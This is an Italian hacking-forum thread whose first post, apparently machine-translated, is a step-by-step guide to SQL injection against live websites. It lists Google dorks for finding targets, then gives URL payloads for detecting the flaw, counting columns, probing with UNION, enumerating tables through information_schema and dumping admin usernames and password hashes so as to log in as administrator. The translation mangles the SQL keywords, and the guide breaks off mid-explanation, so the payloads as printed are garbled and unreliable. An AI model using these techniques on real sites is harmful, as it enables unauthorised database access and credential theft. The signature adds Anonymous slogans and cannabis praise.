[Guida]Guida all' SQL Injenction
Si prega di disabilitare gli script di anti adblock per visualizzare questa pagina
NAV
Ciao, ospite! Accedi o Registrati su Stertix.it
LoginRegistrati
Registrati adesso è GRATUITO

Appena entrato avrai:
Norton Safe Web Connessione HTTPS Sicura

Registrati Adesso!

Pubblicità


Tag: GuidaGuida, Injenction,
Nuova Discussione
Rispondi alla Discussione
 
Valutazione discussione:
  • 0 voti - 0 media
  • 1
  • 2
  • 3
  • 4
  • 5
Guida [Guida]Guida all' SQL Injenction
4462 Visite
Utente Normale
*
5.00C
2013 Jul
2
26
Utente Normale

Utente Cazzeggiatore
Utente Drogato
Utente Folle
Utente Habbo
Utente Minecraft
Utente Pigro
Utente Retroservista
Utente Saggio
Utente Stertix
Messaggio: #1
Guida [Guida]Guida all' SQL Injenction
09/07/2013 14:58

Aggiorna il tuo account per nascondere gli annunci pubblicitari.

cosa è SQL Injection:

[b]L'atto di immissione di dati non validi o imprevisti (magari in un modulo front-end web o un'applicazione front-end, per esempio) in modo che il database back-end SQL in esecuzione dietro il sito web o applicazione esegue SQL comandi che il programmatore non ha mai inteso a consentire, eventualmente, permettendo a un intruso a rompere in o danneggiare il database.


1 ) trovare il bersaglio e ottenere la ADMIN PASSWORD

Prima di tutto dobbiamo trovare il nostro sito web obiettivo di fare che è possibile utilizzare questo "cretini".
vi darò qualche dorks qui!

inurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurl:play_old.php?id=
inurl:declaration_more.php?decl_id=
inurl:pageid=inurl:games.php?id=
inurl:page.php?file=
inurl:newsDetail.php?id=

Per altre dorks scaricatele e,e sono 13 mila LOL (letteralmente) date da una mia carissima amica (na mezza anonymous) Ivana!

Lista Dork

[b]2). Verificare la presenza di vulnerabilità


Diciamo che abbiamo qualche sito come questo:


Ora, per verificare se è vulrnable aggiungiamo alla fine dell'URL '
come questo:


quindi se abbiamo un po 'di errore del tipo
"Hai un errore nella sintassi SQL, controllare il manuale che corrisponde alla versione del server MySQL per il diritto, ecc .."
o qualcosa di simile che significa è vulnerabile a SQL injection!

3). Trovare il numero di colonne:

per trovare il numero di colonne che usiamo dichiarazione ORDER BY (dice di database come ordinare il risultato) così come si usa? Bene solo incrementando il numero fino a quando otteniamo un errore.

http : / / http://www.site.com/news.php?id=4 ordine da 1 / * <- nessun errore

http : / / http://www.site.com/news.php?id=4 ordine da 2 / * <- nessun errore

http : / / http://www.site.com/news.php?id=4 ordine da 3 / * <- nessun errore

http : / / http://www.site.com/news.php?id=4 fine del 4 / *

errore in ordine da 4 (si ottiene un messaggio come questo Unknown column '4 'in' order clause 'o qualcosa di simile)
che significa che l'ha 3 colonne, la causa che abbiamo ottenuto un errore su 4.

4). Verificare la funzione UNION

Con l'unione possiamo selezionare più dati in una istruzione SQL. così abbiamo

http : / / http://www.site.com/news.php?id=4 unione tutte select 1,2,3 / *

(Abbiamo già constatato che il numero di colonne sono 3 nella sezione 2). )
se vediamo alcuni numeri sullo schermo, cioè 1 o 2 o 3, allora l'Unione si avvale

5). Verificare la versione di MySQL

http : / / http://www.site.com/news.php?id=4 unione tutte select 1,2,3 / *

NOTA: se / * non funzionante o ottenere qualche errore, quindi provare - è un commento ed è importante per la nostra query per funzionare correttamente. lasciate dire che abbiamo il numero 2 nella schermata, ora per verificare la versione sostituiamo il numero 2 con @ @ versione o la versione () e ottenere someting come 4.1.33-log o 5.0.45 o simili. che dovrebbe assomigliare a questa:

http : / / http://www.site.com/news.php?id=4 unione tutte select 1, @ @ versione, 3 / *

se si ottiene un errore "unione + mix illegale delle regole di confronto (implicito + coercibile) ..."
non ho visto nessuna carta che copre questo problema, quindi devo scrivere che
abbiamo bisogno di convertire () funzione ie

http : / / http://www.site.com/news.php?id=4 unione tutte select 1, convertito (@ @ versione con latin1), 3 / *

o con hex ​​() e unhex ()
ie

http : / / http://www.site.com/news.php?id=4 unione tutte select 1, unhex (hex (@ @ version)), 3 / *

e si otterrà la versione di MySQL!

6). Ottenere tabella e il nome della colonna

e se la versione di MySQL è <5 (cioè 4.1.33, 4.1.12 ...) <--- poi mi limiterò a descrivere per MySQL> 5 versione. dobbiamo indovinare tabella e il nome della colonna nella maggior parte dei casi . nomi di tabella comuni sono: user / s, admin / s, membro / s ... i nomi delle colonne comuni sono: nome utente, utente, usr, user_name, password, passare, passwd, pwd ecc .. cioè sarebbe

http : / / http://www.site.com/news.php?id=4 unione tutte select 1,2,3 from admin / *

Si vede il numero 2 nella schermata come prima, e questo è buono),
sappiamo che tavolo amministratore esiste ...
ora per controllare i nomi delle colonne.

http : / / http://www.site.com/news.php?id=4 sindacato tutto selezionare 1, nome utente, 3 da Admin / *

(Se si ottiene un errore, quindi provare l'altro nome della colonna)
abbiamo visto la password nella schermata di hash o di testo semplice, dipende di come il database sia impostato cioè hash md5, mysql hash, sha1 ... ora dobbiamo completare query per cercare bello per questo possiamo usare concat () la funzione (si unisce stringhe) ie

http : / / http://www.site.com/news.php?id=4 unione tutte select 1, concat (username, 0x3a, password), 3 da Admin / *

Nota che ho messo 0x3A, il suo valore esadecimale per: (così 0x3A è il valore esadecimale per il colon) (c'è un altro modo per quello, char (58), il valore ASCII per:)

http : ? / / site.com / news.php id = 4 unione tutte select 1, concat (username, char (58), la password), 3 da Admin / *

ora arriviamo nome utente detenere l': la password sullo schermo, cioè admin: admin o admin: somehash
quando si ha questo, è possibile effettuare il login come amministratore o qualche superuser
se non può indovinare il nome della tabella a destra, si può sempre provare mysql.user (default )
ha all'utente i colonne di password, in modo da esempio potrebbe essere:

http : / / http://www.site.com/news.php?id=4 unione tutte select 1, concat (user, 0x3a, password), 3 dal mysql.user / *

7). MySQL 5

come ho detto prima io faro 'spiegare come ottenere nomi di tabella e di colonna
in MySQL> 5.
Per questo abbiamo bisogno information_schema. Contiene tutte le tabelle e le colonne del database.
ottenere tabelle che usiamo nome_tabella e INFORMATION_SCHEMA.TABLES.
ie


http : / / http://www.site.com/news.php?id=4 sindacato tutto selezionare 1, nome_tabella, 3 dal INFORMATION_SCHEMA.TABLES / *

qui si sostituisce il nostro numero 2 con nome_tabella per ottenere il primo tavolo da INFORMATION_SCHEMA.TABLES visualizzati sullo schermo. Ora dobbiamo aggiungere LIMITE alla fine della query per elencare tutte le tabelle.
ie

http : / / http://www.site.com/news.php?id=4 sindacato tutto selezionare 1, nome_tabella, 3 da INFORMATION_SCHEMA.TABLES limitare 0,1 / *

Nota che ho messo 0,1 (ottenere 1 risultato a partire dal 0)
ora per visualizzare la seconda tabella, cambiamo limite di 0,1 per limitare 1,1
ie

http : / / http://www.site.com/news.php?id=4 sindacato tutto selezionare 1, nome_tabella, 3 da INFORMATION_SCHEMA.TABLES limitare 1,1 / *
viene visualizzata la seconda tabella.
per il terzo tavolo abbiamo messo limite di 2,1
ie

http : / / http://www.site.com/news.php?id=4 sindacato tutto selezionare 1, nome_tabella, 3 da INFORMATION_SCHEMA.TABLES limitare 2,1 / *
mantenere l'incremento fino ad ottenere alcuni utili come db_admin, poll_user, auth, auth_user ecc .. Per ottenere i nomi delle colonne Il metodo è lo stesso. qui usiamo nome_di_colonna e INFORMATION_SCHEMA.COLUMNS il metodo è lo stesso come sopra così esempio potrebbe essere







http : / / http://www.site.com/news.php?id=4 sindacato tutto selezionare 1, column_name, 3 dal limite INFORMATION_SCHEMA.COLUMNS 0,1 / *
la prima colonna viene mostrata. seconda (cambiamo limite di 0,1 per limitare 1,1), vale a dire.





http : / / http://www.site.com/news.php?id=4 sindacato tutto selezionare 1, column_name, 3 dal limite INFORMATION_SCHEMA.COLUMNS 1,1 / *
viene visualizzata la seconda colonna, in modo da mantenere l'incremento fino ad ottenere qualcosa come nome utente, utente, login, password, passare, passwd, ecc .. se volete visualizzare i nomi delle colonne per tabella specifica utilizzare questa query. (Clausola where) diciamo che abbiamo trovato gli utenti della tabella.

Questa guida era in inglese fatta da "Ivana" io ho tradotto e l ho condivisa con voi! :D

Un po lunga me ce l abbiam fattaaaaaaaaaaaaaaa!

:fottiti:

Alla prossima brasoni!:vecchio::matto::wtf:
[/b]

Fonte: forum esterno

Firma:

WE ARE ANONYMOUS.,
WE ARE LEGION,
WE DO NOT FORGIVE,
WE DO NOT FORGET,YOU SHOULD'VE EXPECTED US!


"Più la gente fuma l'erba, più Babilonia cade."
"L'Erba è come la frutta. Ti mantiene in forma e ti libera la mente."
"La rivoluzione non si prepara, esplode."


[Immagine: 50ffhw.gif][Immagine: k0oor8.gif]

Rispondi


Utente Medio
**
5.00C
2014 Feb
10
63
Utente Medio

Utente Drogato
Utente Folle
Utente Habbo
Utente Notturno
Utente Retroservista
Utente Saggio
Utente Stertix
Messaggio: #2
Guida [Guida]Guida all' SQL Injenction
04/02/2014 00:07


Guida utile chiara e almeno non è la solita che si trova sui forum tutta copiata davvero utile per chi non sa cosa sia complimenti ;)

Rispondi


Aggiorna il tuo account per nascondere gli annunci pubblicitari.



Facebook Twitter Linkedin MySpace Technorati Digg

Utente(i) che stanno guardando questa discussione: 1 Ospite(i)



Discussioni correlate...
Discussione: Autore Risposte: Letto: Ultimo messaggio
Information Guida [GUIDA] Fare due ricariche al prezzo di una. Stertix 5 358 23/07/2017 19:29
Ultimo messaggio: Stertix
  Guida [GUIDA]Come bypassare le survey list Stertix 0 3,847 24/04/2017 12:00
Ultimo messaggio: Stertix
  Discussione Censurata [MEGA GUIDA] Come intercettare le forza dell'ordine [MEGA GUIDA] Alekos Retro 1 708 22/10/2014 18:37
Ultimo messaggio: Stertix



contatore